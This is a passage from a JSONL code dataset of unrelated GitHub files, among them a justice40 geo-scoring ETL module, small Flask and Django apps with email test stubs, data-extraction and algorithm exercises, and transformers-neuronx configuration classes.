self.HIGH_LOW_ZOOM_CENSUS_TRACT_THRESHOLD\n )\n assert (\n keep_high_zoom.sum() != initial_state_tracts.shape[0]\n ), \"Error: Cutoff is too high, nothing is aggregated\"\n assert keep_high_zoom.sum() > 1, \"Error: Nothing is kept at high zoom\"\n\n # Then we assign buckets only to tracts that do not get \"kept\" at high zoom\n state_tracts = initial_state_tracts[~keep_high_zoom].copy()\n state_tracts[f\"{self.TARGET_SCORE_RENAME_TO}_bucket\"] = np.arange(\n len(state_tracts)\n )\n # assign tracts to buckets by score\n state_tracts = state_tracts.sort_values(\n self.TARGET_SCORE_RENAME_TO, ascending=True\n )\n score_bucket = []\n bucket_size = math.ceil(\n len(state_tracts.index) / self.NUMBER_OF_BUCKETS\n )\n\n # This just increases the number of buckets so they are more\n # homogeneous. It's not actually necessary :shrug:\n while (\n state_tracts[self.TARGET_SCORE_RENAME_TO].sum() % bucket_size\n > self.HOMOGENEITY_THRESHOLD\n ):\n self.NUMBER_OF_BUCKETS += 1\n bucket_size = math.ceil(\n len(state_tracts.index) / self.NUMBER_OF_BUCKETS\n )\n\n logger.debug(\n f\"The number of buckets has increased to {self.NUMBER_OF_BUCKETS}\"\n )\n for i in range(len(state_tracts.index)):\n score_bucket.extend([math.floor(i / bucket_size)])\n state_tracts[f\"{self.TARGET_SCORE_RENAME_TO}_bucket\"] = score_bucket\n\n return state_tracts, initial_state_tracts[keep_high_zoom]\n\n def _aggregate_buckets(\n self, state_tracts: gpd.GeoDataFrame, agg_func: str\n ) -> gpd.GeoDataFrame:\n keep_cols = [\n self.TARGET_SCORE_RENAME_TO,\n f\"{self.TARGET_SCORE_RENAME_TO}_bucket\",\n self.GEOMETRY_FIELD_NAME,\n ]\n\n # We dissolve all other tracts by their score bucket\n state_dissolve = state_tracts[keep_cols].dissolve(\n by=f\"{self.TARGET_SCORE_RENAME_TO}_bucket\", aggfunc=agg_func\n )\n return state_dissolve\n\n def _breakup_multipolygons(\n self, state_bucketed_df: gpd.GeoDataFrame, num_buckets: int\n ) -> gpd.GeoDataFrame:\n\n compressed = []\n for i in range(num_buckets):\n for j in range(\n len(state_bucketed_df[self.GEOMETRY_FIELD_NAME][i].geoms)\n ):\n compressed.append(\n [\n state_bucketed_df[self.TARGET_SCORE_RENAME_TO][i],\n state_bucketed_df[self.GEOMETRY_FIELD_NAME][i].geoms[j],\n ]\n )\n return compressed\n\n def _join_high_and_low_zoom_frames(\n self, compressed: list, keep_high_zoom_df: gpd.GeoDataFrame\n ) -> gpd.GeoDataFrame:\n keep_columns = [\n self.TARGET_SCORE_RENAME_TO,\n self.GEOMETRY_FIELD_NAME,\n ]\n compressed_geodf = gpd.GeoDataFrame(\n compressed,\n columns=keep_columns,\n crs=\"EPSG:4326\",\n )\n return pd.concat([compressed_geodf, keep_high_zoom_df[keep_columns]])\n\n def load(self) -> None:\n # Create separate threads to run each write to disk.\n def write_high_to_file():\n logger.info(\"Writing usa-high (~9 minutes)\")\n\n self.geojson_score_usa_high.to_file(\n filename=self.SCORE_HIGH_GEOJSON,\n driver=\"GeoJSON\",\n )\n logger.info(\"Completed writing usa-high\")\n\n def write_low_to_file():\n logger.info(\"Writing usa-low (~9 minutes)\")\n self.geojson_score_usa_low.to_file(\n filename=self.SCORE_LOW_GEOJSON, driver=\"GeoJSON\"\n )\n logger.info(\"Completed writing usa-low\")\n\n def create_esri_codebook(codebook) -> pd.DataFrame:\n \"\"\"temporary: helper to make a codebook for esri shapefile only\"\"\"\n\n shapefile_column_field = \"shapefile_column\"\n internal_column_name_field = \"column_name\"\n column_description_field = \"column_description\"\n\n logger.info(\"Creating an ESRI codebook with shortened column names\")\n codebook = (\n pd.Series(codebook)\n .reset_index()\n .rename(\n columns={\n 0: internal_column_name_field,\n \"index\": shapefile_column_field,\n }\n )\n )\n\n # open yaml config\n downloadable_csv_config = load_yaml_dict_from_file(\n self.CONTENT_CONFIG / \"csv.yml\", CSVConfig\n )\n column_rename_dict = load_dict_from_yaml_object_fields(\n yaml_object=downloadable_csv_config[\"fields\"],\n object_key=\"score_name\",\n object_value=\"label\",\n )\n\n codebook[column_description_field] = codebook[\n internal_column_name_field\n ].map(column_rename_dict)\n\n codebook = codebook[\n [\n shapefile_column_field,\n internal_column_name_field,\n column_description_field,\n ]\n ]\n logger.info(\"Completed creating ESRI codebook\")\n\n return codebook\n\n def combine_esri_codebook_with_original_codebook(esri_codebook_df):\n \"\"\"Combines the ESRI codebook generated above with the original codebook generated\n during score-post. Essentially we want to include the shapefile column name in the\n original codebook.\"\"\"\n\n logger.info(\"Combining ESRI codebook with original codebook\")\n\n # load up the original codebook\n original_codebook_df = pd.read_csv(\n constants.SCORE_DOWNLOADABLE_CODEBOOK_FILE_PATH,\n low_memory=False,\n )\n\n # if we've already combined these files in the past, go ahead and remove the columns so we can do it again\n original_codebook_df.drop(\n \"shapefile_label\", axis=1, errors=\"ignore\", inplace=True\n )\n\n # add the esri (shapefile) columns to the original codebook by joining the two dataframes\n combined_codebook_df = original_codebook_df.merge(\n esri_codebook_df[[\"shapefile_column\", \"column_name\"]],\n how=\"outer\",\n left_on=\"Description\",\n right_on=\"column_name\",\n )\n\n # if any descriptions are blank, replace them with the column_name description from the esri codebook\n combined_codebook_df[\"Description\"].mask(\n combined_codebook_df[\"Description\"].isnull(),\n combined_codebook_df[\"column_name\"],\n inplace=True,\n )\n combined_codebook_df = combined_codebook_df.drop(\n \"column_name\", axis=1\n )\n\n # move some stuff around to make it easier to read the output\n shapefile_col = combined_codebook_df.pop(\"shapefile_column\")\n combined_codebook_df.insert(2, \"shapefile_label\", shapefile_col)\n\n # save the combined codebook\n combined_codebook_df.to_csv(\n constants.SCORE_DOWNLOADABLE_CODEBOOK_FILE_PATH, index=False\n )\n logger.info(\n \"Completed combining ESRI codebook with original codebook\"\n )\n\n def write_esri_shapefile():\n logger.info(\"Producing ESRI shapefiles\")\n # Note that esri shapefiles can't have long column names, so we borrow from the\n # shorten some tile names (renaming map) and print out a codebook for the user\n codebook = {}\n renaming_map = {}\n\n # allows us to quickly rename / describe columns\n reversed_tiles = {\n short: long\n for long, short in constants.TILES_SCORE_COLUMNS.items()\n }\n\n for i, column in enumerate(self.geojson_score_usa_high.columns):\n # take first 6 characters and add a number to ensure uniqueness\n # this is the max due to esri (index can be 3-digits)\n if len(column) > 10:\n new_col = column[:6] + f\"_{i}\"\n else:\n new_col = column\n codebook[new_col] = reversed_tiles.get(column, column)\n if new_col != column:\n renaming_map[column] = new_col\n\n self.geojson_score_usa_high.rename(columns=renaming_map).to_file(\n self.SCORE_SHP_FILE\n )\n logger.info(\"Completed writing shapefile\")\n\n esri_codebook_df = create_esri_codebook(codebook)\n combine_esri_codebook_with_original_codebook(esri_codebook_df)\n\n arcgis_zip_file_path = self.SCORE_SHP_PATH / \"usa.zip\"\n arcgis_files = []\n for file in os.listdir(self.SCORE_SHP_PATH):\n # don't remove __init__ files as they conserve dir structure\n if file != \"__init__.py\":\n arcgis_files.append(self.SCORE_SHP_PATH / file)\n arcgis_files.append(constants.SCORE_DOWNLOADABLE_CODEBOOK_FILE_PATH)\n zip_files(arcgis_zip_file_path, arcgis_files)\n logger.info(\"Completed zipping shapefiles\")\n\n # Per #1557:\n # Zip file that contains the shapefiles, codebook and checksum file.\n # Normally we get the codebook file path using this constant:\n # - codebook_path = constants.SCORE_DOWNLOADABLE_CODEBOOK_FILE_PATH\n # However since we generate it on a separate script (etl_score_post)\n # the time stamp can be generated again, and thus the file is not found.\n # So we grab it from the downloadable dir and if we don't find it, it\n # means we haven't run etl_score_post, and continue\n\n logger.info(\"Getting codebook from downloadable dir\")\n codebook_path = None\n for file in os.listdir(constants.SCORE_DOWNLOADABLE_DIR):\n if \"codebook\" in file:\n codebook_path = constants.SCORE_DOWNLOADABLE_DIR / file\n\n if codebook_path:\n version_shapefile_codebook_zip_path = (\n constants.SCORE_VERSIONING_SHAPEFILE_CODEBOOK_FILE_PATH\n )\n readme_path = constants.SCORE_VERSIONING_README_FILE_PATH\n\n logger.info(\"Compressing shapefile and codebook files\")\n files_to_compress = [\n arcgis_zip_file_path,\n codebook_path,\n readme_path,\n ]\n zip_files(\n version_shapefile_codebook_zip_path, files_to_compress\n )\n\n with concurrent.futures.ThreadPoolExecutor() as executor:\n futures = {\n executor.submit(task)\n for task in [\n write_high_to_file,\n write_low_to_file,\n write_esri_shapefile,\n ]\n }\n\n for fut in concurrent.futures.as_completed(futures):\n # Calling result will raise an exception if one occurred.\n # Otherwise, the exceptions are silently ignored.\n fut.result()\n","repo_name":"usds/justice40-tool","sub_path":"data/data-pipeline/data_pipeline/etl/score/etl_score_geo.py","file_name":"etl_score_geo.py","file_ext":"py","file_size_in_byte":18563,"program_lang":"python","lang":"en","doc_type":"code","stars":113,"dataset":"github-code","pt":"3"} +{"seq_id":"12240950554","text":"from flask import Flask, redirect, url_for,render_template,request\r\nimport json\r\nimport schedule as sh\r\napp = Flask(__name__)\r\n\r\n@app.route('/')\r\ndef form():\r\n return render_template(\"try.html\")\r\n\r\n@app.route('/success',methods=[\"POST\"])\r\ndef success():\r\n user=request.form[\"txt_user\"]\r\n profile=request.form[\"txt_profile\"]\r\n sd=request.form[\"txt_sd\"]\r\n ed=request.form[\"txt_ed\"]\r\n sh.all_operations(user,profile,sd,ed)\r\n return redirect(\"/display\") \r\n\r\n@app.route('/display',methods=[\"GET\"])\r\ndef display():\r\n with open(\"dictionary_list.json\") as f:\r\n data=json.load(f)\r\n return render_template(\"display.html\",data=data)\r\n\r\n@app.route('/success2',methods=[\"POST\"])\r\ndef success2():\r\n with open(\"dictionary_list.json\") as f:\r\n data=json.load(f)\r\n return render_template(\"display.html\",data=data)\r\nif __name__ == '__main__':\r\n app.run(debug = True)","repo_name":"Poonam-cyber/Flask","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":909,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"38917871630","text":"# This code runs for about 10 minutes.\n\nimport csv\nimport itertools\nfrom time import gmtime, strftime\n\nno_ott_source = 0\nno_ott_target = 0\n\ndef main():\n global no_ott_source\n global no_ott_target\n print(strftime(\"%Y-%m-%d %H:%M:%S\", gmtime()))\n print('-------------------')\n\n filepath = \"./data/GloBI_Dump/interactions.tsv\"\n parasite_source = [\"parasiteOf\", \"pathogenOf\"]\n parasite_target = [\"hasParasite\", \"hasPathogen\"]\n freeliving_source = [\"preysOn\", \"eats\", \"flowersVisitedBy\", \"hasPathogen\", \"pollinatedBy\", \"hasParasite\", \"hostOf\"]\n freeliving_target = [\"preyedUponBy\", \"parasiteOf\", \"visitsFlowersOf\", \"pathogenOf\", \"hasHost\"]\n # [[\"ott_id\",\"taxon_name\"]]\n freelivings = []\n parasites = []\n \n freelivings_path = './data/interaction_data/freelivings.csv' \n parasites_path = './data/interaction_data/parasites.csv' \n\n index = 0\n\n with open(filepath, \"r\", encoding=\"utf8\") as tsv_file:\n reader = csv.reader(tsv_file, delimiter='\\t')\n for row in reader:\n index += 1\n interaction = row[10]\n # eliminate useless interactions\n # -------------------------------- source? --------------------------------\n if any(interaction in source for source in (freeliving_source, parasite_source)):\n if row[0] == '' or not 'OTT' in row[0]:\n print('no ott available')\n else:\n ott = row[0].split(':')\n name = row[1]\n # normal case (otherwise no ott available, but maybe another one):\n if len(ott) >= 2:\n if interaction in freeliving_source:\n freelivings.append([ott[1], name, interaction])\n elif interaction in parasite_source:\n parasites.append([ott[1], name, interaction])\n # -------------------------------- target? --------------------------------\n if any(interaction in target for target in (freeliving_target, parasite_target)):\n if row[11] == '' or not 'OTT' in row[11]:\n print('no ott available')\n else:\n ott = row[11].split(':')\n name = row[12]\n # normal case (otherwise no ott available, but maybe another one):\n if len(ott) >= 2:\n if interaction in freeliving_target:\n freelivings.append([ott[1], name, interaction])\n elif interaction in parasite_target:\n parasites.append([ott[1], name, interaction])\n\n print('-------------------')\n print(strftime(\"%Y-%m-%d %H:%M:%S\", gmtime()))\n print('-------------------')\n print('tsv_len =', index)\n print('no ott source:', no_ott_source)\n print('no ott target:', no_ott_target)\n\n freelivings = disambiguate_list(freelivings, 'freelivings')\n parasites = disambiguate_list(parasites, 'parasites')\n\n # -------------------------------------------------\n with open(freelivings_path, \"w\") as f:\n writer = csv.writer(f)\n writer.writerows(freelivings)\n\n with open(parasites_path, \"w\") as f:\n writer = csv.writer(f)\n writer.writerows(parasites)\n # -------------------------------------------------\n print('-------------------')\n print(strftime(\"%Y-%m-%d %H:%M:%S\", gmtime()))\n return\n\ndef is_int(value):\n try: \n int(value)\n return True\n except ValueError:\n return False\n\ndef disambiguate_list(current_list, name):\n print('number of', name, ':', len(current_list))\n current_list.sort()\n current_list = list(current_list for current_list,_ in itertools.groupby(current_list))\n print('number of', name, ':', len(current_list), '(distinct)')\n return current_list\n\nmain()\n","repo_name":"Irallia/IZW-HU-Parasites","sub_path":"code/metadata/extract_globi_data.py","file_name":"extract_globi_data.py","file_ext":"py","file_size_in_byte":3913,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"3"} +{"seq_id":"8005128532","text":"import matplotlib.pyplot as plt\n\nimport numpy as np\nimport pandas as pd\n\nfrom sklearn import linear_model\n\n\nclass Regression:\n def linear_regression(x, y, ind):\n lm = linear_model.LinearRegression()\n model = lm.fit(np.array(x).reshape(-1, 1), np.array(y).reshape(-1, 1))\n\n slope = lm.coef_\n intercept = lm.intercept_\n prediction = slope * ind + intercept\n\n regression = [\n lm.coef_,\n lm.intercept_,\n lm.score(np.array(x).reshape(-1, 1), np.array(y).reshape(-1, 1)),\n prediction,\n ]\n\n return regression\n\n def plot(x, y, y1):\n plt.plot(x, y, \"o-\")\n plt.plot(x, y1, \"x-\")\n plt.xticks(range(min(x), max(x) + 1))\n plt.title(\"GA Progress Over Generations\")\n plt.ylabel(\"Game Score\")\n plt.xlabel(\"Epoch\")\n\n plt.savefig(\"Graph\")\n","repo_name":"kb1900/Cultris-Tetris-AI","sub_path":"c2ai/learning/deap/pso/downstack/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":876,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"73992808082","text":"import os\n\nfrom django.core.files.uploadedfile import SimpleUploadedFile\nfrom django.conf import settings\nfrom django.core.mail.backends.base import BaseEmailBackend\n\n\ndef create_upload_image():\n fixture_path = os.path.join(settings.BASE_DIR, 'emails', 'tests',\n 'fixtures', 'test.jpg')\n raw_file = open(fixture_path, 'rb')\n uploaded_image = SimpleUploadedFile(\n 'test.jpg',\n raw_file.read()\n )\n raw_file.close()\n uploaded_image.content_type = 'image/jpeg'\n return uploaded_image\n\n\ndef create_upload_file(path, content):\n raw_file = open(path, 'w')\n raw_file.write(content)\n raw_file.close()\n raw_file = open(path, 'rb')\n uploaded_file = SimpleUploadedFile(\n path.split('/')[-1],\n raw_file.read()\n )\n raw_file.close()\n return uploaded_file\n\n\ndef get_jpg_content():\n fixture_path = os.path.join(settings.BASE_DIR, 'emails', 'tests',\n 'fixtures', 'test.jpg')\n raw_file = open(fixture_path, 'rb')\n return raw_file.read()\n\n\nclass EmailBackendMockSuccess(BaseEmailBackend):\n response = None\n\n def send_messages(self, email_messages):\n for msg in email_messages:\n msg.response_content = [{'id': '348dj38dj28do5jd82'}]\n\n\nclass EmailBackendMockFailure(BaseEmailBackend):\n response = None\n\n def send_messages(self, email_messages):\n for msg in email_messages:\n msg.response_content = None\n\n\nclass ResponseManagerStub(object):\n def process_response(self, email, entry):\n if email.response_content is not None:\n entry.thirdparty_id = email.response_content[0]['id']\n return True\n return False\n\n\nclass EmailBackendMockReject(BaseEmailBackend):\n response = None\n\n def send_messages(self, email_messages):\n for msg in email_messages:\n msg.response_content = [{'rejected_because': 'potato'}]\n\n\nclass ResponseManagerRejectStub(object):\n def process_response(self, email, entry):\n entry.thirdparty_reject = email.response_content[0]['rejected_because']\n return False\n","repo_name":"qdqmedia/leela","sub_path":"emails/tests/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2122,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"72192390803","text":"import numpy as np\n\nclass OrderedVector:\n\n def __init__(self, capacity):\n self.capacity = capacity\n self.last_position = -1\n self.values = np.empty(self.capacity, dtype=int)\n\n # O(n)\n def imprime(self):\n if self.last_position == -1:\n print('O vetor está vazio')\n else:\n for i in range(self.last_position + 1):\n print(i, ' - ', self.values[i])\n\n # O(n)\n def insere(self, valor):\n if self.last_position == self.capacity - 1:\n print('Capacidade máxima atingida')\n return\n\n posicao = 0\n for i in range(self.last_position + 1):\n posicao = i\n if self.values[i] > valor:\n break\n if i == self.last_position:\n posicao = i + 1\n\n x = self.last_position\n while x >= posicao:\n self.values[x + 1] = self.values[x]\n x -= 1\n\n self.values[posicao] = valor\n self.last_position += 1\n\n # O(n)\n def pesquisa_linear(self, valor):\n for i in range(self.last_position + 1):\n if self.values[i] > valor:\n return -1\n if self.values[i] == valor:\n return i\n if i == self.last_position:\n return -1\n\n # O(log n)\n def pesquisa_binaria(self, valor):\n limite_inferior = 0\n limite_superior = self.last_position\n\n while True:\n posicao_atual = int((limite_inferior + limite_superior) / 2)\n # Se achou na primeira tentativa\n if self.values[posicao_atual] == valor:\n return posicao_atual\n # Se não achou\n elif limite_inferior > limite_superior:\n return -1\n # Divide os limites\n else:\n # Limite inferior\n if self.values[posicao_atual] < valor:\n limite_inferior = posicao_atual + 1\n # Limite superior\n else:\n limite_superior = posicao_atual - 1\n\n # O(n)\n def excluir(self, valor):\n posicao = self.pesquisa_linear(valor)\n if posicao == -1:\n return -1\n else:\n for i in range(posicao, self.last_position):\n self.values[i] = self.values[i + 1]\n\n self.last_position -= 1\n\n\nvetor = OrderedVector(10)\nvetor.imprime()\n\nvetor.insere(6)\nvetor.imprime()\n\nvetor.insere(4)\nvetor.imprime()\n\nvetor.insere(3)\nvetor.imprime()\n\nvetor.insere(5)\nvetor.imprime()\n\nvetor.insere(1)\nvetor.imprime()\n\nvetor.insere(8)\nvetor.imprime()\n\nvetor.pesquisa_linear(3)\n\nvetor.pesquisa_linear(2)\n\nvetor.pesquisa_linear(9)\n\nvetor.imprime()\n\nvetor.excluir(5)\nvetor.imprime()\n\nvetor.excluir(1)\nvetor.imprime()\n\nvetor.excluir(8)\nvetor.imprime()\n\nvetor.excluir(9)\n\nvetor = OrderedVector(10)\nvetor.insere(8)\nvetor.insere(9)\nvetor.insere(4)\nvetor.insere(1)\nvetor.insere(5)\nvetor.insere(7)\nvetor.insere(11)\nvetor.insere(13)\nvetor.insere(2)\nvetor.imprime()\n\nvetor.pesquisa_binaria(7)\n\nvetor.pesquisa_binaria(5)\n\nvetor.pesquisa_binaria(13)\n\nvetor.pesquisa_binaria(20)","repo_name":"glauberss2007/AI-overview","sub_path":"search_algotithms/ordered-vector/orderedVector.py","file_name":"orderedVector.py","file_ext":"py","file_size_in_byte":3123,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"8475302870","text":"#!/usr/bin/env python3\n\nfloor = 0\nfor line in open('input.txt'):\n for i, x in enumerate(line):\n if x == '(':\n floor += 1\n elif x == ')':\n floor -=1\n if floor == -1:\n print(i + 1)\n break\n\n","repo_name":"tetrismegistus/minutia","sub_path":"exercises/guided_tutorials/advent15/1_2.py","file_name":"1_2.py","file_ext":"py","file_size_in_byte":255,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"3"} +{"seq_id":"17902811532","text":"from django.urls import path, re_path, include\nfrom main.views import (\nhome,\npostUrlForm,\nfinalLogic\n)\nurlpatterns = [\n\t\t# path(r'', landing, name=\"landing\"),\n\t\tpath(r'', home, name=\"landing\"),\n\t\tpath('post/urlform/', postUrlForm, name ='url_form_submit'),\n\t\tpath(r'page/.pdf/', finalLogic, name=\"pdf\")\n\t\t]\n\n","repo_name":"PiusLucky/html_pdf","sub_path":"main/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":317,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"19667817376","text":"# logic: we need to keep track of all projects we can complete using curr 'w'.\n# for this we will maintain a minHeap.\n# And from the all possible projects we have to take the most profitable project, so we will maintain a maxHeap for this.\n# Ele that we will pop from MaxHeap will be our ans.\n\n# time: O(k* 2*logn), space= O(n)\nclass Solution:\n def findMaximizedCapital(self, k: int, w: int, profits: List[int], capital: List[int]) -> int:\n maxProfit= [] # stores the profit of projects we can afford with current 'w'. creating maxHeap to get the maxProfit project \n minCapital= [(c, p) for c, p in zip(capital, profits)] # creating minHeap for pair (c, p)\n heapq.heapify(minCapital)\n print(minCapital)\n\n for i in range(k):\n # maxProfit= [] # creating here giving wrong ans. # Reason: we can get high profit project from the already added projects in 'maxProfit' \n # But we are adding from scratch for each project.\n\n # add all the profits of projects that we can afford into maxProfit with current capital 'w'. \n while minCapital and minCapital[0][0] <= w:\n c, p= heapq.heappop(minCapital)\n heapq.heappush(maxProfit, -1* p)\n # check if maxProfit is empty. if empty means we can't add any project so simply break or return\n if not maxProfit:\n return w\n # Add the maxProfit project that we can afford with 'w'.\n w+= -1* heapq.heappop(maxProfit)\n return w\n","repo_name":"Ravi-0412/DSA-Program-And-Notes","sub_path":"Heap/502. IPO.py","file_name":"502. IPO.py","file_ext":"py","file_size_in_byte":1557,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"3"} +{"seq_id":"33007828651","text":"from flask import Flask, jsonify, abort, make_response, request\nfrom flask_mongoengine import MongoEngine\nfrom bson.json_util import dumps\nfrom helper import convert_artical_to_dict, convert_items_to_list\nimport subprocess\n\napp = Flask(__name__)\napp.config[\"MONGODB_SETTINGS\"] = {'DB': \"arsenal\"}\napp.config[\"SECRET_KEY\"] = \"KeepThisS3cr3t\"\n\nPAGE_SIZE = 30\ndb = MongoEngine(app)\n\n\n@app.route(\"/\")\ndef index():\n return \"This is for Arsenal Fans!!!\"\n\n\n@app.route(\"/arsenal/item/\")\n@app.route(\"/arsenal/item//\")\ndef item(page=0):\n from models import Item\n start = page * PAGE_SIZE\n end = (page + 1) * PAGE_SIZE\n articals = convert_items_to_list(Item.objects.order_by('-artical_id')[\n start:end])\n return dumps(articals)\n\n\n@app.route(\"/arsenal/article//\", methods=['GET'])\ndef artical(id):\n from models import Artical\n artical = Artical.objects(artical_id=id).get()\n return dumps(convert_artical_to_dict(artical, False))\n\n\n@app.route(\"/arsenal/article//\", methods=['POST'])\ndef article_with_user(article_id):\n if not request.json:\n abort(400)\n if not 'user_id' in request.json:\n abort(400)\n user_id = request.json['user_id']\n from models import Artical, Favorite\n article = Artical.objects(artical_id=article_id).get()\n obj = Favorite.objects(user_id=user_id)\n if obj:\n favorite = obj.get()\n article_list = favorite.article_list\n if article_id in article_list:\n return dumps(convert_artical_to_dict(article, True))\n return dumps(convert_artical_to_dict(article, False))\n\n\n@app.route(\"/arsenal/favorites/\", methods=['POST'])\ndef post_favorite():\n if not request.json or not 'user_id' in request.json or not 'article_id' in request.json:\n abort(400)\n user_id = request.json['user_id']\n article_id = request.json['article_id']\n from models import Favorite\n obj = Favorite.objects(user_id=user_id)\n if obj:\n favorite = obj.get()\n else:\n favorite = Favorite(user_id=user_id)\n favorite.article_list.append(article_id)\n favorite.article_list.sort(reverse=True)\n favorite.save()\n return jsonify({\"response_msg\": \"success\", \"response_code\": 201}), 201\n\n\n@app.route(\"/arsenal/favorites//\", methods=['GET'])\ndef get_favorite(id):\n from models import Favorite, Item\n favorite_items = []\n obj = Favorite.objects(user_id=id)\n if obj:\n favorite = obj.get()\n for article_id in favorite.article_list:\n item = Item.objects(artical_id=article_id).get()\n favorite_items.append(item)\n return dumps(convert_items_to_list(favorite_items))\n\n\n@app.route(\"/arsenal/favorites///\",\n methods=['DELETE'])\ndef del_favorite(user_id, article_id):\n from models import Favorite\n obj = Favorite.objects(user_id=user_id)\n if obj:\n favorite = obj.get()\n if article_id in favorite.article_list:\n obj.update_one(pull__article_list=article_id)\n return jsonify({\"response_msg\": \"success\",\n \"response_code\": 200}), 200\n return jsonify({\"response_msg\": \"Not Found\", \"response_code\": 404}), 404\n\n\n@app.errorhandler(404)\ndef not_found(error):\n return make_response(\n jsonify({'response_msg': 'Not Found',\n 'response_code': 404}), 404)\n\n\n@app.errorhandler(400)\ndef error_request(error):\n return make_response(\n jsonify({'response_msg': 'Bad Request',\n 'response_code': 400}), 400)\n\n\n@app.route(\"/arsenal/spider/\")\ndef spider():\n rc = subprocess.call(\"bash application/spider.sh\", shell=True)\n return str(rc)\n","repo_name":"lichuan0217/arsenal-server","sub_path":"application/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3695,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"34640400328","text":"import math\n\nfrom transformers_neuronx.utils import build_dense_mask, create_blk_mask\n\nclass QuantizationConfig:\n \"\"\" The config class that contains all quantization related settings \"\"\"\n\n def __init__(self, quant_dtype='s8', dequant_dtype='f16', quantize_method='vector_dynamic',\n quantize_attn=True):\n QUANT_DTYPE_LIST = ['s8',]\n QUANTIZE_METHOD_LIST = ['vector_dynamic',]\n\n # The data type that the parameter is quantized into\n self.quant_dtype = quant_dtype\n if self.quant_dtype not in QUANT_DTYPE_LIST:\n raise NotImplementedError(f\"{self.quant_dtype} is not implemented. \\\n Available options are {','.join(QUANT_DTYPE_LIST)}\")\n\n # The data type that is dequantized to\n self.dequant_dtype = dequant_dtype\n\n # Which quantization algorithm to use\n self.quantize_method = quantize_method\n if self.quantize_method not in QUANTIZE_METHOD_LIST:\n raise NotImplementedError(f\"{self.quantize_method} is not implemented. \\\n Available options are {','.join(QUANTIZE_METHOD_LIST)}\")\n\n # Decide whether the attention layer needs be quantized\n self.quantize_attn = quantize_attn\n\nclass SparseAttnConfig:\n \"\"\" The config class that contains sparse attention related settings \"\"\"\n def __init__(self, attn_type='blk_sparse', causal=False,\n # blk-sparse configs\n blk_size=128,\n num_global_blks=0, num_local_blks=1, num_random_blks=0,\n # User can directly provide the masks if needed\n # Must provide a dict mapping from seq_len --> mask\n sparse_mask_dict=None, active_sparse_mask_dict=None):\n ATTN_TYPE_LIST = ['blk_sparse', 'custom']\n\n assert attn_type in ATTN_TYPE_LIST, f'Supported attention types are: {ATTN_TYPE_LIST}'\n if attn_type == 'blk_sparse':\n self.blk_size = blk_size\n self.num_global_blks = num_global_blks\n self.num_local_blks = num_local_blks\n self.num_random_blks = num_random_blks\n self.sparse_mask_dict = {}\n self.active_sparse_mask_dict = {}\n else:\n self.sparse_mask_dict = sparse_mask_dict\n self.active_sparse_mask_dict = active_sparse_mask_dict\n self.attn_type = attn_type\n self.causal = causal\n\n def create_sparse_mask(self, q_seq_len, kv_seq_len):\n \"\"\" Create a mask that defines how the new tokens attend to the old tokens \"\"\"\n assert ((q_seq_len == 1) or (q_seq_len == kv_seq_len)), \\\n \"Only supporting decode mode (q_seq_len=1) or self-attention mode (q_seq_len=k_seq_len)!\"\n key = (q_seq_len, kv_seq_len)\n if self.attn_type == 'custom':\n return self.sparse_mask_dict[key]\n\n # If using blk-sparse, search a cache first\n if key in self.sparse_mask_dict:\n return self.sparse_mask_dict[key]\n # If not found, generate it\n blks_q = math.ceil(q_seq_len / self.blk_size)\n blks_kv = math.ceil(kv_seq_len / self.blk_size)\n blk_mask = create_blk_mask(\n blks_q, blks_kv,\n self.num_global_blks,\n self.num_local_blks,\n self.num_random_blks,\n self.causal and (q_seq_len != 1)\n )\n dense_mask = build_dense_mask(\n q_seq_len, kv_seq_len,\n blk_mask, self.blk_size,\n self.causal and (q_seq_len != 1)\n )\n self.sparse_mask_dict[key] = dense_mask\n return dense_mask.detach()\n\n def create_active_sparse_mask(self, n_active_tokens):\n \"\"\" Create a mask that defines how the new tokens attend to each other \"\"\"\n if self.attn_type == 'custom':\n return self.active_sparse_mask_dict[n_active_tokens]\n\n # Same as above, except that we have q_seq_len = 1 now\n if n_active_tokens in self.active_sparse_mask_dict:\n return self.active_sparse_mask_dict[n_active_tokens]\n # If not found, generate it\n blks_q = 1\n blks_kv = math.ceil(n_active_tokens / self.blk_size)\n blk_mask = create_blk_mask(\n blks_q, blks_kv,\n self.num_global_blks,\n self.num_local_blks,\n self.num_random_blks,\n False # causal\n )\n dense_mask = build_dense_mask(\n 1, n_active_tokens,\n blk_mask, self.blk_size,\n False # causal\n )\n self.active_sparse_mask_dict[n_active_tokens] = dense_mask\n return dense_mask.detach()\n\n\nclass NeuronConfig():\n \"\"\" The class contains all Neuron related configs \"\"\"\n def __init__(self, **kargs):\n # Quantization related configurations\n self.quant = kargs.pop('quant', None)\n # Sparse attention related configurations\n self.sparse_attn = kargs.pop('sparse_attn', None)\n\nclass GenerationConfig:\n\n def __init__(self, *,\n max_length = None, # Default: Infer max sequence length from model\n do_sample = False, # Default: Greedy\n top_k = 50, # Default: Top 50 (when sampling)\n eos_token_id = None, # Default: Ignore EOS token\n early_stopping = None, # Default: Open-ended generation\n temperature = None, # Default: No temperature application\n ):\n self.max_length = max_length\n self.do_sample = do_sample\n self.top_k = top_k\n self.eos_token_id = eos_token_id\n self.early_stopping = early_stopping\n self.temperature = temperature\n\n","repo_name":"aws-neuron/transformers-neuronx","sub_path":"src/transformers_neuronx/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":5619,"program_lang":"python","lang":"en","doc_type":"code","stars":66,"dataset":"github-code","pt":"3"} +{"seq_id":"70140113363","text":"import sys\r\n\r\nfrom PyQt4 